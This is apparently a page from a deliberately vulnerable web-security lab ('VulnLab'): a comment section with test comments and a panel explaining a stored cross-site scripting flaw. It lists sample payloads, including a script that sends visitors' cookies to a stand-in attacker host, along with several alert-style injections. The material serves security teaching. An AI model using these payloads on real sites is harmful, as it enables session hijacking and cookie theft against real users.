โ† Back to Dashboard

Post a Comment

Clear Test Comments

Comments (3)

admin 2026-10-06 15:25:35
Welcome to VulnLab! This is a test comment.
user 2026-10-06 15:25:35
Great platform for learning security!
john 2026-10-06 15:25:35
I found some interesting vulnerabilities here.

๐ŸŽฏ Vulnerability Info

Type: Stored Cross-Site Scripting (XSS)

Severity: Critical

๐Ÿ’ก How to Exploit

  • Comments are stored in database without sanitization
  • Displayed to all users without output encoding
  • JavaScript executes every time page is loaded
  • Can steal cookies, sessions, or perform actions

๐Ÿงช Sample Payloads

<script>alert('Stored XSS')</script> <script> document.location='http://attacker.com/steal.php?c='+document.cookie </script> <img src=x onerror="alert(document.cookie)"> <svg/onload=alert('XSS')> <body onload="alert('XSS')"> <div onmouseover="alert('XSS')">Hover me</div>

โš ๏ธ Impact

  • Session hijacking
  • Cookie theft
  • Keylogging
  • Phishing attacks
  • Defacement